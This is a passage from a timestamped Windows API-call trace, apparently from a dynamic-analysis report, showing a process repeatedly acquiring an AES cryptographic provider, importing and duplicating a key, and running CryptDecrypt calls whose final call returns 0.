pbData=0x262cd14, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0121.984] CryptContextAddRef (hProv=0x767290, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.984] CryptContextAddRef (hProv=0x767290, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.985] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4bc8c00) returned 1 [0121.985] CryptContextAddRef (hProv=0x767290, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.985] CryptSetKeyParam (hKey=0x4bc8c00, dwParam=0x4, pbData=0x262d484*=0x1, dwFlags=0x0) returned 1 [0121.985] CryptSetKeyParam (hKey=0x4bc8c00, dwParam=0x1, pbData=0x262d450, dwFlags=0x0) returned 1 [0121.985] CryptDecrypt (in: hKey=0x4bc8c00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x262d564, pdwDataLen=0x18a220 | out: pbData=0x262d564, pdwDataLen=0x18a220) returned 1 [0121.985] CryptDecrypt (in: hKey=0x4bc8c00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x262d5a8, pdwDataLen=0x18a220 | out: pbData=0x262d5a8, pdwDataLen=0x18a220) returned 0 [0121.985] CryptDestroyKey (hKey=0x74f850) returned 1 [0121.985] CryptReleaseContext (hProv=0x767290, dwFlags=0x0) returned 1 [0121.985] CryptReleaseContext (hProv=0x767290, dwFlags=0x0) returned 1 [0121.985] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x767318) returned 1 [0121.986] CryptImportKey (in: hProv=0x767318, pbData=0x262d8d8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0121.986] CryptContextAddRef (hProv=0x767318, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.986] CryptContextAddRef (hProv=0x767318, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.986] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4bc8c80) returned 1 [0121.986] CryptContextAddRef (hProv=0x767318, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.986] CryptSetKeyParam (hKey=0x4bc8c80, dwParam=0x4, pbData=0x262e048*=0x1, dwFlags=0x0) returned 1 [0121.988] CryptSetKeyParam (hKey=0x4bc8c80, dwParam=0x1, pbData=0x262e014, dwFlags=0x0) returned 1 [0121.988] CryptDecrypt (in: hKey=0x4bc8c80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x262e128, pdwDataLen=0x18a220 | out: pbData=0x262e128, pdwDataLen=0x18a220) returned 1 [0121.988] CryptDecrypt (in: hKey=0x4bc8c80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x262e16c, pdwDataLen=0x18a220 | out: pbData=0x262e16c, pdwDataLen=0x18a220) returned 0 [0121.988] CryptDestroyKey (hKey=0x74f850) returned 1 [0121.988] CryptReleaseContext (hProv=0x767318, dwFlags=0x0) returned 1 [0121.988] CryptReleaseContext (hProv=0x767318, dwFlags=0x0) returned 1 [0121.988] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x7673a0) returned 1 [0121.989] CryptImportKey (in: hProv=0x7673a0, pbData=0x262e4b0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0121.989] CryptContextAddRef (hProv=0x7673a0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.989] CryptContextAddRef (hProv=0x7673a0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.989] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4bc8d00) returned 1 [0121.989] CryptContextAddRef (hProv=0x7673a0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.989] CryptSetKeyParam (hKey=0x4bc8d00, dwParam=0x4, pbData=0x262ec30*=0x1, dwFlags=0x0) returned 1 [0121.989] CryptSetKeyParam (hKey=0x4bc8d00, dwParam=0x1, pbData=0x262ebfc, dwFlags=0x0) returned 1 [0121.990] CryptDecrypt (in: hKey=0x4bc8d00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x262ed14, pdwDataLen=0x18a1f0 | out: pbData=0x262ed14, pdwDataLen=0x18a1f0) returned 1 [0121.990] CryptDecrypt (in: hKey=0x4bc8d00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x262ed74, pdwDataLen=0x18a220 | out: pbData=0x262ed74, pdwDataLen=0x18a220) returned 1 [0121.990] CryptDecrypt (in: hKey=0x4bc8d00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x262edbc, pdwDataLen=0x18a220 | out: pbData=0x262edbc, pdwDataLen=0x18a220) returned 0 [0121.990] CryptDestroyKey (hKey=0x74f850) returned 1 [0121.990] CryptReleaseContext (hProv=0x7673a0, dwFlags=0x0) returned 1 [0121.990] CryptReleaseContext (hProv=0x7673a0, dwFlags=0x0) returned 1 [0121.990] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x767428) returned 1 [0121.991] CryptImportKey (in: hProv=0x767428, pbData=0x262f124, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0121.991] CryptContextAddRef (hProv=0x767428, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.991] CryptContextAddRef (hProv=0x767428, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.991] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4bc8d80) returned 1 [0121.991] CryptContextAddRef (hProv=0x767428, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.991] CryptSetKeyParam (hKey=0x4bc8d80, dwParam=0x4, pbData=0x262f894*=0x1, dwFlags=0x0) returned 1 [0121.991] CryptSetKeyParam (hKey=0x4bc8d80, dwParam=0x1, pbData=0x262f860, dwFlags=0x0) returned 1 [0121.991] CryptDecrypt (in: hKey=0x4bc8d80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x262f974, pdwDataLen=0x18a220 | out: pbData=0x262f974, pdwDataLen=0x18a220) returned 1 [0121.991] CryptDecrypt (in: hKey=0x4bc8d80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x262f9bc, pdwDataLen=0x18a220 | out: pbData=0x262f9bc, pdwDataLen=0x18a220) returned 0 [0121.991] CryptDestroyKey (hKey=0x74f850) returned 1 [0121.991] CryptReleaseContext (hProv=0x767428, dwFlags=0x0) returned 1 [0121.992] CryptReleaseContext (hProv=0x767428, dwFlags=0x0) returned 1 [0121.992] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x7674b0) returned 1 [0121.992] CryptImportKey (in: hProv=0x7674b0, pbData=0x262fd14, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0121.992] CryptContextAddRef (hProv=0x7674b0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.993] CryptContextAddRef (hProv=0x7674b0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.993] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4bc8e00) returned 1 [0121.993] CryptContextAddRef (hProv=0x7674b0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.993] CryptSetKeyParam (hKey=0x4bc8e00, dwParam=0x4, pbData=0x26304e4*=0x1, dwFlags=0x0) returned 1 [0121.993] CryptSetKeyParam (hKey=0x4bc8e00, dwParam=0x1, pbData=0x26304b0, dwFlags=0x0) returned 1 [0121.993] CryptDecrypt (in: hKey=0x4bc8e00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26305e8, pdwDataLen=0x18a1f0 | out: pbData=0x26305e8, pdwDataLen=0x18a1f0) returned 1 [0121.993] CryptDecrypt (in: hKey=0x4bc8e00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2630658, pdwDataLen=0x18a220 | out: pbData=0x2630658, pdwDataLen=0x18a220) returned 1 [0121.993] CryptDecrypt (in: hKey=0x4bc8e00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x26306a0, pdwDataLen=0x18a220 | out: pbData=0x26306a0, pdwDataLen=0x18a220) returned 0 [0121.993] CryptDestroyKey (hKey=0x74f850) returned 1 [0121.993] CryptReleaseContext (hProv=0x7674b0, dwFlags=0x0) returned 1 [0121.993] CryptReleaseContext (hProv=0x7674b0, dwFlags=0x0) returned 1 [0121.993] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x767538) returned 1 [0121.994] CryptImportKey (in: hProv=0x767538, pbData=0x2630ac8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0121.994] CryptContextAddRef (hProv=0x767538, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.994] CryptContextAddRef (hProv=0x767538, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.994] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4bc8e80) returned 1 [0121.994] CryptContextAddRef (hProv=0x767538, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.994] CryptSetKeyParam (hKey=0x4bc8e80, dwParam=0x4, pbData=0x2631238*=0x1, dwFlags=0x0) returned 1 [0121.994] CryptSetKeyParam (hKey=0x4bc8e80, dwParam=0x1, pbData=0x2631204, dwFlags=0x0) returned 1 [0121.995] CryptDecrypt (in: hKey=0x4bc8e80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2631318, pdwDataLen=0x18a220 | out: pbData=0x2631318, pdwDataLen=0x18a220) returned 1 [0121.995] CryptDecrypt (in: hKey=0x4bc8e80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2631360, pdwDataLen=0x18a220 | out: pbData=0x2631360, pdwDataLen=0x18a220) returned 0 [0121.995] CryptDestroyKey (hKey=0x74f850) returned 1 [0121.995] CryptReleaseContext (hProv=0x767538, dwFlags=0x0) returned 1 [0121.995] CryptReleaseContext (hProv=0x767538, dwFlags=0x0) returned 1 [0121.995] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x7675c0) returned 1 [0121.996] CryptImportKey (in: hProv=0x7675c0, pbData=0x2631698, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0121.996] CryptContextAddRef (hProv=0x7675c0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.996] CryptContextAddRef (hProv=0x7675c0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.996] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4bc8f00) returned 1 [0121.996] CryptContextAddRef (hProv=0x7675c0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.996] CryptSetKeyParam (hKey=0x4bc8f00, dwParam=0x4, pbData=0x2631e08*=0x1, dwFlags=0x0) returned 1 [0121.996] CryptSetKeyParam (hKey=0x4bc8f00, dwParam=0x1, pbData=0x2631dd4, dwFlags=0x0) returned 1 [0121.996] CryptDecrypt (in: hKey=0x4bc8f00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2631ee8, pdwDataLen=0x18a220 | out: pbData=0x2631ee8, pdwDataLen=0x18a220) returned 1 [0121.996] CryptDecrypt (in: hKey=0x4bc8f00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2631f30, pdwDataLen=0x18a220 | out: pbData=0x2631f30, pdwDataLen=0x18a220) returned 0 [0121.996] CryptDestroyKey (hKey=0x74f850) returned 1 [0121.996] CryptReleaseContext (hProv=0x7675c0, dwFlags=0x0) returned 1 [0121.996] CryptReleaseContext (hProv=0x7675c0, dwFlags=0x0) returned 1 [0121.997] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x767648) returned 1 [0121.999] CryptImportKey (in: hProv=0x767648, pbData=0x2632268, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0121.999] CryptContextAddRef (hProv=0x767648, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.999] CryptContextAddRef (hProv=0x767648, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.999] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4bc8f80) returned 1 [0121.999] CryptContextAddRef (hProv=0x767648, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.999] CryptSetKeyParam (hKey=0x4bc8f80, dwParam=0x4, pbData=0x26329d8*=0x1, dwFlags=0x0) returned 1 [0121.999] CryptSetKeyParam (hKey=0x4bc8f80, dwParam=0x1, pbData=0x26329a4, dwFlags=0x0) returned 1 [0121.999] CryptDecrypt (in: hKey=0x4bc8f80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2632ab8, pdwDataLen=0x18a220 | out: pbData=0x2632ab8, pdwDataLen=0x18a220) returned 1 [0121.999] CryptDecrypt (in: hKey=0x4bc8f80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2632b00, pdwDataLen=0x18a220 | out: pbData=0x2632b00, pdwDataLen=0x18a220) returned 0 [0121.999] CryptDestroyKey (hKey=0x74f850) returned 1 [0121.999] CryptReleaseContext (hProv=0x767648, dwFlags=0x0) returned 1 [0121.999] CryptReleaseContext (hProv=0x767648, dwFlags=0x0) returned 1 [0121.999] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x7676d0) returned 1 [0122.000] CryptImportKey (in: hProv=0x7676d0, pbData=0x2632e3c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0122.000] CryptContextAddRef (hProv=0x7676d0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.001] CryptContextAddRef (hProv=0x7676d0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.001] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4bc9000) returned 1 [0122.001] CryptContextAddRef (hProv=0x7676d0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.001] CryptSetKeyParam (hKey=0x4bc9000, dwParam=0x4, pbData=0x26335ac*=0x1, dwFlags=0x0) returned 1 [0122.001] CryptSetKeyParam (hKey=0x4bc9000, dwParam=0x1, pbData=0x2633578, dwFlags=0x0) returned 1 [0122.001] CryptDecrypt (in: hKey=0x4bc9000, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x263368c, pdwDataLen=0x18a220 | out: pbData=0x263368c, pdwDataLen=0x18a220) returned 1 [0122.001] CryptDecrypt (in: hKey=0x4bc9000, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x26336d4, pdwDataLen=0x18a220 | out: pbData=0x26336d4, pdwDataLen=0x18a220) returned 0 [0122.001] CryptDestroyKey (hKey=0x74f850) returned 1 [0122.001] CryptReleaseContext (hProv=0x7676d0, dwFlags=0x0) returned 1 [0122.001] CryptReleaseContext (hProv=0x7676d0, dwFlags=0x0) returned 1 [0122.001] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x767758) returned 1 [0122.002] CryptImportKey (in: hProv=0x767758, pbData=0x2633a0c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0122.002] CryptContextAddRef (hProv=0x767758, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.003] CryptContextAddRef (hProv=0x767758, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.003] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4bc9080) returned 1 [0122.003] CryptContextAddRef (hProv=0x767758, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.003] CryptSetKeyParam (hKey=0x4bc9080, dwParam=0x4, pbData=0x263417c*=0x1, dwFlags=0x0) returned 1 [0122.003] CryptSetKeyParam (hKey=0x4bc9080, dwParam=0x1, pbData=0x2634148, dwFlags=0x0) returned 1 [0122.003] CryptDecrypt (in: hKey=0x4bc9080, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x263425c, pdwDataLen=0x18a220 | out: pbData=0x263425c, pdwDataLen=0x18a220) returned 1 [0122.003] CryptDecrypt (in: hKey=0x4bc9080, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x26342a4, pdwDataLen=0x18a220 | out: pbData=0x26342a4, pdwDataLen=0x18a220) returned 0 [0122.003] CryptDestroyKey (hKey=0x74f850) returned 1 [0122.003] CryptReleaseContext (hProv=0x767758, dwFlags=0x0) returned 1 [0122.003] CryptReleaseContext (hProv=0x767758, dwFlags=0x0) returned 1 [0122.003] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x7677e0) returned 1 [0122.004] CryptImportKey (in: hProv=0x7677e0, pbData=0x26345dc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0122.004] CryptContextAddRef (hProv=0x7677e0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.004] CryptContextAddRef (hProv=0x7677e0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.004] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4bc9100) returned 1 [0122.004] CryptContextAddRef (hProv=0x7677e0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.004] CryptSetKeyParam (hKey=0x4bc9100, dwParam=0x4, pbData=0x2634d4c*=0x1, dwFlags=0x0) returned 1 [0122.004] CryptSetKeyParam (hKey=0x4bc9100, dwParam=0x1, pbData=0x2634d18, dwFlags=0x0) returned 1 [0122.004] CryptDecrypt (in: hKey=0x4bc9100, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2634e2c, pdwDataLen=0x18a220 | out: pbData=0x2634e2c, pdwDataLen=0x18a220) returned 1 [0122.004] CryptDecrypt (in: hKey=0x4bc9100, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2634e74, pdwDataLen=0x18a220 | out: pbData=0x2634e74, pdwDataLen=0x18a220) returned 0 [0122.004] CryptDestroyKey (hKey=0x74f850) returned 1 [0122.005] CryptReleaseContext (hProv=0x7677e0, dwFlags=0x0) returned 1 [0122.005] CryptReleaseContext (hProv=0x7677e0, dwFlags=0x0) returned 1 [0122.005] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x767868) returned 1 [0122.006] CryptImportKey (in: hProv=0x767868, pbData=0x26351ac, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0122.006] CryptContextAddRef (hProv=0x767868, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.006] CryptContextAddRef (hProv=0x767868, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.007] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4bc9180) returned 1 [0122.007] CryptContextAddRef (hProv=0x767868, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.007] CryptSetKeyParam (hKey=0x4bc9180, dwParam=0x4, pbData=0x263591c*=0x1, dwFlags=0x0) returned 1 [0122.007] CryptSetKeyParam (hKey=0x4bc9180, dwParam=0x1, pbData=0x26358e8, dwFlags=0x0) returned 1 [0122.007] CryptDecrypt (in: hKey=0x4bc9180, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26359fc, pdwDataLen=0x18a220 | out: pbData=0x26359fc, pdwDataLen=0x18a220) returned 1 [0122.007] CryptDecrypt (in: hKey=0x4bc9180, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2635a44, pdwDataLen=0x18a220 | out: pbData=0x2635a44, pdwDataLen=0x18a220) returned 0 [0122.007] CryptDestroyKey (hKey=0x74f850) returned 1 [0122.007] CryptReleaseContext (hProv=0x767868, dwFlags=0x0) returned 1 [0122.007] CryptReleaseContext (hProv=0x767868, dwFlags=0x0) returned 1 [0122.007] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x7678f0) returned 1 [0122.008] CryptImportKey (in: hProv=0x7678f0, pbData=0x2635d7c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0122.008] CryptContextAddRef (hProv=0x7678f0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.008] CryptContextAddRef (hProv=0x7678f0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.008] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4bc9200) returned 1 [0122.008] CryptContextAddRef (hProv=0x7678f0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.008] CryptSetKeyParam (hKey=0x4bc9200, dwParam=0x4, pbData=0x26364ec*=0x1, dwFlags=0x0) returned 1 [0122.008] CryptSetKeyParam (hKey=0x4bc9200, dwParam=0x1, pbData=0x26364b8, dwFlags=0x0) returned 1 [0122.008] CryptDecrypt (in: hKey=0x4bc9200, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26365cc, pdwDataLen=0x18a220 | out: pbData=0x26365cc, pdwDataLen=0x18a220) returned 1 [0122.008] CryptDecrypt (in: hKey=0x4bc9200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2636614, pdwDataLen=0x18a220 | out: pbData=0x2636614, pdwDataLen=0x18a220) returned 0 [0122.008] CryptDestroyKey (hKey=0x74f850) returned 1 [0122.008] CryptReleaseContext (hProv=0x7678f0, dwFlags=0x0) returned 1 [0122.008] CryptReleaseContext (hProv=0x7678f0, dwFlags=0x0) returned 1 [0122.008] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x767978) returned 1 [0122.009] CryptImportKey (in: hProv=0x767978, pbData=0x263694c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0122.009] CryptContextAddRef (hProv=0x767978, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.009] CryptContextAddRef (hProv=0x767978, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.009] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4bc9280) returned 1 [0122.009] CryptContextAddRef (hProv=0x767978, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.009] CryptSetKeyParam (hKey=0x4bc9280, dwParam=0x4, pbData=0x26370bc*=0x1, dwFlags=0x0) returned 1 [0122.009] CryptSetKeyParam (hKey=0x4bc9280, dwParam=0x1, pbData=0x2637088, dwFlags=0x0) returned 1 [0122.010] CryptDecrypt (in: hKey=0x4bc9280, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x263719c, pdwDataLen=0x18a220 | out: pbData=0x263719c, pdwDataLen=0x18a220) returned 1 [0122.010] CryptDecrypt (in: hKey=0x4bc9280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x26371e4, pdwDataLen=0x18a220 | out: pbData=0x26371e4, pdwDataLen=0x18a220) returned 0 [0122.010] CryptDestroyKey (hKey=0x74f850) returned 1 [0122.010] CryptReleaseContext (hProv=0x767978, dwFlags=0x0) returned 1 [0122.010] CryptReleaseContext (hProv=0x767978, dwFlags=0x0) returned 1 [0122.010] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x767a00) returned 1 [0122.011] CryptImportKey (in: hProv=0x767a00, pbData=0x263751c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0122.011] CryptContextAddRef (hProv=0x767a00, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.011] CryptContextAddRef (hProv=0x767a00, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.011] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4bc9300) returned 1 [0122.011] CryptContextAddRef (hProv=0x767a00, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.011] CryptSetKeyParam (hKey=0x4bc9300, dwParam=0x4, pbData=0x2637c8c*=0x1, dwFlags=0x0) returned 1 [0122.011] CryptSetKeyParam (hKey=0x4bc9300, dwParam=0x1, pbData=0x2637c58, dwFlags=0x0) returned 1 [0122.011] CryptDecrypt (in: hKey=0x4bc9300, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2637d6c, pdwDataLen=0x18a220 | out: pbData=0x2637d6c, pdwDataLen=0x18a220) returned 1 [0122.011] CryptDecrypt (in: hKey=0x4bc9300, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2637db0, pdwDataLen=0x18a220 | out: pbData=0x2637db0, pdwDataLen=0x18a220) returned 0 [0122.011] CryptDestroyKey (hKey=0x74f850) returned 1 [0122.011] CryptReleaseContext (hProv=0x767a00, dwFlags=0x0) returned 1 [0122.011] CryptReleaseContext (hProv=0x767a00, dwFlags=0x0) returned 1 [0122.011] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x767a88) returned 1 [0122.012] CryptImportKey (in: hProv=0x767a88, pbData=0x26380e4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0122.012] CryptContextAddRef (hProv=0x767a88, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.012] CryptContextAddRef (hProv=0x767a88, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.012] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4bc9380) returned 1 [0122.012] CryptContextAddRef (hProv=0x767a88, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.012] CryptSetKeyParam (hKey=0x4bc9380, dwParam=0x4, pbData=0x2638854*=0x1, dwFlags=0x0) returned 1 [0122.012] CryptSetKeyParam (hKey=0x4bc9380, dwParam=0x1, pbData=0x2638820, dwFlags=0x0) returned 1 [0122.013] CryptDecrypt (in: hKey=0x4bc9380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2638934, pdwDataLen=0x18a220 | out: pbData=0x2638934, pdwDataLen=0x18a220) returned 1 [0122.013] CryptDecrypt (in: hKey=0x4bc9380, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2638978, pdwDataLen=0x18a220 | out: pbData=0x2638978, pdwDataLen=0x18a220) returned 0 [0122.013] CryptDestroyKey (hKey=0x74f850) 